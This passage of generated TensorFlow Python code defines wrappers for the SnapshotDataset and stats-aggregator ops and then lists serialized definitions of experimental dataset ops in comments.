  outputs = _execute.execute(b"SamplingDataset", 1, inputs=flat_inputs,
                             attrs=op_attrs, ctx=exec_ctx, name=name)
  _execute.record_gradient(
      "SamplingDataset", flat_inputs, op_attrs, outputs, name)
  dataset, = outputs
  return dataset
def snapshot_dataset(input_dataset, path, output_types, output_shapes, name=None):
  r"""Creates a dataset that will write to / read from a snapshot.

  This dataset attempts to determine whether a valid snapshot exists at the
  `snapshot_path`, and reads from the snapshot in lieu of using `input_dataset`.
  If not, it will run the preprocessing pipeline as usual, and write out a
  snapshot of the data processed for future use.

  Args:
    input_dataset: A `Tensor` of type `variant`.
      A variant tensor representing the input dataset.
    path: A `Tensor` of type `string`.
      The path we should write snapshots to / read snapshots from.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  # Eager fast path: inputs first, then attrs, in the exact order the C
  # layer expects for this op.
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "SnapshotDataset", name, _ctx._post_execution_callbacks,
        input_dataset, path, "output_types", output_types, "output_shapes",
        output_shapes)
      return _result
    except _core._FallbackException:
      try:
        # Fast path refused the inputs; retry through the slower eager path.
        return snapshot_dataset_eager_fallback(
            input_dataset, path, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message to aid debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: validate and coerce the list attrs, then build the op.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'snapshot_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'snapshot_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "SnapshotDataset", input_dataset=input_dataset, path=path,
                           output_types=output_types,
                           output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "SnapshotDataset", _inputs_flat, _attrs, _result, name)
  # Single-output op: unpack the one variant tensor.
  _result, = _result
  return _result
def SnapshotDataset(input_dataset, path, output_types, output_shapes, name=None):
  # Raw-op alias: forwards every argument, unchanged, to the snake_case
  # implementation above.
  return snapshot_dataset(
      input_dataset=input_dataset,
      path=path,
      output_types=output_types,
      output_shapes=output_shapes,
      name=name)
# Finish wiring up the raw-op alias: copy the implementation's docstring,
# hide the alias from generated API docs, force keyword-only invocation,
# and export it under `tf.raw_ops.SnapshotDataset`.
SnapshotDataset.__doc__ = snapshot_dataset.__doc__
SnapshotDataset = _doc_controls.do_not_generate_docs(_kwarg_only(SnapshotDataset))
tf_export("raw_ops.SnapshotDataset")(SnapshotDataset)
def snapshot_dataset_eager_fallback(input_dataset, path, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function snapshot_dataset
  """
  _ctx = ctx or _context.context()
  # Validate and normalize each list attr in turn (order preserved so that
  # errors surface for 'output_types' before 'output_shapes').
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'snapshot_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_dt, "output_types")
                  for _dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'snapshot_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_sh, "output_shapes")
                   for _sh in output_shapes]
  # Coerce the op's two tensor inputs to their declared dtypes.
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  path = _ops.convert_to_tensor(path, _dtypes.string)
  _inputs_flat = [input_dataset, path]
  _attrs = ("output_types", output_types, "output_shapes", output_shapes)
  _result = _execute.execute(b"SnapshotDataset", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "SnapshotDataset", _inputs_flat, _attrs, _result, name)
  # The op has exactly one output; unwrap it from the result list.
  return _result[0]
def stats_aggregator_handle_v2(container="", shared_name="", name=None):
  r"""TODO: add doc.

  Args:
    container: An optional `string`. Defaults to `""`.
    shared_name: An optional `string`. Defaults to `""`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `resource`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager fast path: hand the call straight to the C layer; only fall back
    # to the Python slow path when the fast path says it cannot handle it.
    try:
      return _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "StatsAggregatorHandleV2", name, _ctx._post_execution_callbacks,
        "container", container, "shared_name", shared_name)
    except _core._FallbackException:
      try:
        return stats_aggregator_handle_v2_eager_fallback(
            container=container, shared_name=shared_name, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      message = e.message if name is None else e.message + " name: " + name
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Graph mode: normalize the string attrs and add a node to the graph.
  container = _execute.make_str("" if container is None else container,
                                "container")
  shared_name = _execute.make_str("" if shared_name is None else shared_name,
                                  "shared_name")
  _, _, _op = _op_def_lib._apply_op_helper(
        "StatsAggregatorHandleV2", container=container,
        shared_name=shared_name, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("container", _op.get_attr("container"), "shared_name",
            _op.get_attr("shared_name"))
  _execute.record_gradient(
      "StatsAggregatorHandleV2", _inputs_flat, _attrs, _result, name)
  # Single-output op: unwrap the handle tensor.
  return _result[0]
def StatsAggregatorHandleV2(container="", shared_name="", name=None):
  # Raw-op alias: delegates directly to the snake_case implementation.
  return stats_aggregator_handle_v2(
      container=container,
      shared_name=shared_name,
      name=name)
# Finish wiring up the raw-op alias: copy the implementation's docstring,
# hide the alias from generated API docs, force keyword-only invocation,
# and export it under `tf.raw_ops.StatsAggregatorHandleV2`.
StatsAggregatorHandleV2.__doc__ = stats_aggregator_handle_v2.__doc__
StatsAggregatorHandleV2 = _doc_controls.do_not_generate_docs(_kwarg_only(StatsAggregatorHandleV2))
tf_export("raw_ops.StatsAggregatorHandleV2")(StatsAggregatorHandleV2)
def stats_aggregator_handle_v2_eager_fallback(container="", shared_name="", name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function stats_aggregator_handle_v2
  """
  _ctx = ctx or _context.context()
  # Normalize the two optional string attrs, defaulting None to "".
  container = _execute.make_str("" if container is None else container,
                                "container")
  shared_name = _execute.make_str("" if shared_name is None else shared_name,
                                  "shared_name")
  _inputs_flat = []  # op takes no tensor inputs
  _attrs = ("container", container, "shared_name", shared_name)
  _result = _execute.execute(b"StatsAggregatorHandleV2", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "StatsAggregatorHandleV2", _inputs_flat, _attrs, _result, name)
  # Single-output op: unwrap the handle tensor.
  return _result[0]
def stats_aggregator_set_summary_writer(stats_aggregator, summary, name=None):
  r"""Set a summary_writer_interface to record statistics using given stats_aggregator.

  Args:
    stats_aggregator: A `Tensor` of type `resource`.
    summary: A `Tensor` of type `resource`.
    name: A name for the operation (optional).

  Returns:
    The created Operation.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager fast path: dispatch straight to the C layer; fall back to the
    # Python slow path only if the fast path cannot handle the call.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "StatsAggregatorSetSummaryWriter", name,
        _ctx._post_execution_callbacks, stats_aggregator, summary)
      return _result
    except _core._FallbackException:
      try:
        return stats_aggregator_set_summary_writer_eager_fallback(
            stats_aggregator, summary, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  _, _, _op = _op_def_lib._apply_op_helper(
      "StatsAggregatorSetSummaryWriter", stats_aggregator=stats_aggregator,
      summary=summary, name=name)
  # The op has no outputs, so return the created Operation itself.
  # NOTE: the generator previously emitted `_result = None; return _result`
  # after this `return`; those lines were unreachable and have been removed.
  return _op
def StatsAggregatorSetSummaryWriter(stats_aggregator, summary, name=None):
  # Raw-op alias: delegates directly to the snake_case implementation.
  return stats_aggregator_set_summary_writer(
      stats_aggregator=stats_aggregator,
      summary=summary,
      name=name)
# Finish wiring up the raw-op alias: copy the implementation's docstring,
# hide the alias from generated API docs, force keyword-only invocation,
# and export it under `tf.raw_ops.StatsAggregatorSetSummaryWriter`.
StatsAggregatorSetSummaryWriter.__doc__ = stats_aggregator_set_summary_writer.__doc__
StatsAggregatorSetSummaryWriter = _doc_controls.do_not_generate_docs(_kwarg_only(StatsAggregatorSetSummaryWriter))
tf_export("raw_ops.StatsAggregatorSetSummaryWriter")(StatsAggregatorSetSummaryWriter)
def stats_aggregator_set_summary_writer_eager_fallback(stats_aggregator, summary, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function stats_aggregator_set_summary_writer
  """
  _ctx = ctx or _context.context()
  # Coerce both resource-handle inputs to their declared dtype.
  stats_aggregator = _ops.convert_to_tensor(stats_aggregator, _dtypes.resource)
  summary = _ops.convert_to_tensor(summary, _dtypes.resource)
  _inputs_flat = [stats_aggregator, summary]
  _attrs = None  # op declares no attrs
  _execute.execute(b"StatsAggregatorSetSummaryWriter", 0,
                   inputs=_inputs_flat, attrs=_attrs, ctx=_ctx, name=name)
  # Zero-output op: nothing to record a gradient for, nothing to return.
  return None
def _InitOpDefLibrary(op_list_proto_bytes):
  """Parse serialized OpList bytes, register the ops, and return an OpDefLibrary."""
  parsed_ops = _op_def_pb2.OpList()
  parsed_ops.ParseFromString(op_list_proto_bytes)
  _op_def_registry.register_op_list(parsed_ops)
  library = _op_def_library.OpDefLibrary()
  library.add_op_list(parsed_ops)
  return library
# op {
# name: "ChooseFastestBranchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "ratio_numerator"
# type: DT_INT64
# }
# input_arg {
# name: "ratio_denominator"
# type: DT_INT64
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "num_elements_per_branch"
# type: "int"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "branches"
# type: "list(func)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "other_arguments_lengths"
# type: "list(int)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalAssertNextDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "transformations"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalAutoShardDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "num_workers"
# type: DT_INT64
# }
# input_arg {
# name: "index"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalBytesProducedStatsDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "tag"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalCSVDataset"
# input_arg {
# name: "filenames"
# type: DT_STRING
# }
# input_arg {
# name: "compression_type"
# type: DT_STRING
# }
# input_arg {
# name: "buffer_size"
# type: DT_INT64
# }
# input_arg {
# name: "header"
# type: DT_BOOL
# }
# input_arg {
# name: "field_delim"
# type: DT_STRING
# }
# input_arg {
# name: "use_quote_delim"
# type: DT_BOOL
# }
# input_arg {
# name: "na_value"
# type: DT_STRING
# }
# input_arg {
# name: "select_cols"
# type: DT_INT64
# }
# input_arg {
# name: "record_defaults"
# type_list_attr: "output_types"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# allowed_values {
# list {
# type: DT_FLOAT
# type: DT_DOUBLE
# type: DT_INT32
# type: DT_INT64
# type: DT_STRING
# }
# }
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalChooseFastestDataset"
# input_arg {
# name: "input_datasets"
# type: DT_VARIANT
# number_attr: "N"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "N"
# type: "int"
# has_minimum: true
# minimum: 2
# }
# attr {
# name: "num_experiments"
# type: "int"
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalDatasetCardinality"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# output_arg {
# name: "cardinality"
# type: DT_INT64
# }
# }
# op {
# name: "ExperimentalDatasetToTFRecord"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "filename"
# type: DT_STRING
# }
# input_arg {
# name: "compression_type"
# type: DT_STRING
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalDenseToSparseBatchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "batch_size"
# type: DT_INT64
# }
# input_arg {
# name: "row_shape"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalDirectedInterleaveDataset"
# input_arg {
# name: "selector_input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "data_input_datasets"
# type: DT_VARIANT
# number_attr: "N"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "N"
# type: "int"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalGroupByReducerDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "key_func_other_arguments"
# type_list_attr: "Tkey_func_other_arguments"
# }
# input_arg {
# name: "init_func_other_arguments"
# type_list_attr: "Tinit_func_other_arguments"
# }
# input_arg {
# name: "reduce_func_other_arguments"
# type_list_attr: "Treduce_func_other_arguments"
# }
# input_arg {
# name: "finalize_func_other_arguments"
# type_list_attr: "Tfinalize_func_other_arguments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "key_func"
# type: "func"
# }
# attr {
# name: "init_func"
# type: "func"
# }
# attr {
# name: "reduce_func"
# type: "func"
# }
# attr {
# name: "finalize_func"
# type: "func"
# }
# attr {
# name: "Tkey_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tinit_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Treduce_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tfinalize_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalGroupByWindowDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "key_func_other_arguments"
# type_list_attr: "Tkey_func_other_arguments"
# }
# input_arg {
# name: "reduce_func_other_arguments"
# type_list_attr: "Treduce_func_other_arguments"
# }
# input_arg {
# name: "window_size_func_other_arguments"
# type_list_attr: "Twindow_size_func_other_arguments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "key_func"
# type: "func"
# }
# attr {
# name: "reduce_func"
# type: "func"
# }
# attr {
# name: "window_size_func"
# type: "func"
# }
# attr {
# name: "Tkey_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Treduce_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Twindow_size_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalIdentityIndexedDataset"
# input_arg {
# name: "size"
# type: DT_UINT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalIgnoreErrorsDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalIndexedDatasetGet"
# input_arg {
# name: "materialized"
# type: DT_RESOURCE
# }
# input_arg {
# name: "index"
# type: DT_UINT64
# }
# output_arg {
# name: "components"
# type_list_attr: "output_types"
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalIndexedDatasetMaterialize"
# input_arg {
# name: "dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "materialized"
# type: DT_RESOURCE
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalIteratorGetDevice"
# input_arg {
# name: "resource"
# type: DT_RESOURCE
# }
# output_arg {
# name: "device"
# type: DT_STRING
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalLMDBDataset"
# input_arg {
# name: "filenames"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalLatencyStatsDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "tag"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalMapAndBatchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# input_arg {
# name: "batch_size"
# type: DT_INT64
# }
# input_arg {
# name: "num_parallel_calls"
# type: DT_INT64
# }
# input_arg {
# name: "drop_remainder"
# type: DT_BOOL
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "preserve_cardinality"
# type: "bool"
# default_value {
# b: false
# }
# }
# }
# op {
# name: "ExperimentalMapDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "use_inter_op_parallelism"
# type: "bool"
# default_value {
# b: true
# }
# }
# attr {
# name: "preserve_cardinality"
# type: "bool"
# default_value {
# b: false
# }
# }
# }
# op {
# name: "ExperimentalMatchingFilesDataset"
# input_arg {
# name: "patterns"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalMaterializedIndexDatasetHandle"
# output_arg {
# name: "handle"
# type: DT_RESOURCE
# }
# attr {
# name: "container"
# type: "string"
# }
# attr {
# name: "shared_name"
# type: "string"
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalMaxIntraOpParallelismDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "max_intra_op_parallelism"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalNonSerializableDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalNumaMapAndBatchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# input_arg {
# name: "batch_size"
# type: DT_INT64
# }
# input_arg {
# name: "num_parallel_calls"
# type: DT_INT64
# }
# input_arg {
# name: "drop_remainder"
# type: DT_BOOL
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "preserve_cardinality"
# type: "bool"
# default_value {
# b: false
# }
# }
# }
# op {
# name: "ExperimentalParallelInterleaveDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# input_arg {
# name: "cycle_length"
# type: DT_INT64
# }
# input_arg {
# name: "block_length"
# type: DT_INT64
# }
# input_arg {
# name: "sloppy"
# type: DT_BOOL
# }
# input_arg {
# name: "buffer_output_elements"
# type: DT_INT64
# }
# input_arg {
# name: "prefetch_input_elements"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalParseExampleDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "num_parallel_calls"
# type: DT_INT64
# }
# input_arg {
# name: "dense_defaults"
# type_list_attr: "Tdense"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "sparse_keys"
# type: "list(string)"
# has_minimum: true
# }
# attr {
# name: "dense_keys"
# type: "list(string)"
# has_minimum: true
# }
# attr {
# name: "sparse_types"
# type: "list(type)"
# has_minimum: true
# allowed_values {
# list {
# type: DT_FLOAT
# type: DT_INT64
# type: DT_STRING
# }
# }
# }
# attr {
# name: "Tdense"
# type: "list(type)"
# has_minimum: true
# allowed_values {
# list {
# type: DT_FLOAT
# type: DT_INT64
# type: DT_STRING
# }
# }
# }
# attr {
# name: "dense_shapes"
# type: "list(shape)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "sloppy"
# type: "bool"
# default_value {
# b: false
# }
# }
# }
# op {
# name: "ExperimentalPrivateThreadPoolDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "num_threads"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalRandomDataset"
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# input_arg {
# name: "seed2"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalRebatchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "num_workers"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalScanDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "initial_state"
# type_list_attr: "Tstate"
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "Tstate"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "preserve_cardinality"
# type: "bool"
# default_value {
# b: false
# }
# }
# }
# op {
# name: "ExperimentalSetStatsAggregatorDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "stats_aggregator"
# type: DT_RESOURCE
# }
# input_arg {
# name: "tag"
# type: DT_STRING
# }
# input_arg {
# name: "counter_prefix"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalSleepDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "sleep_microseconds"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalSlidingWindowDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "window_size"
# type: DT_INT64
# }
# input_arg {
# name: "window_shift"
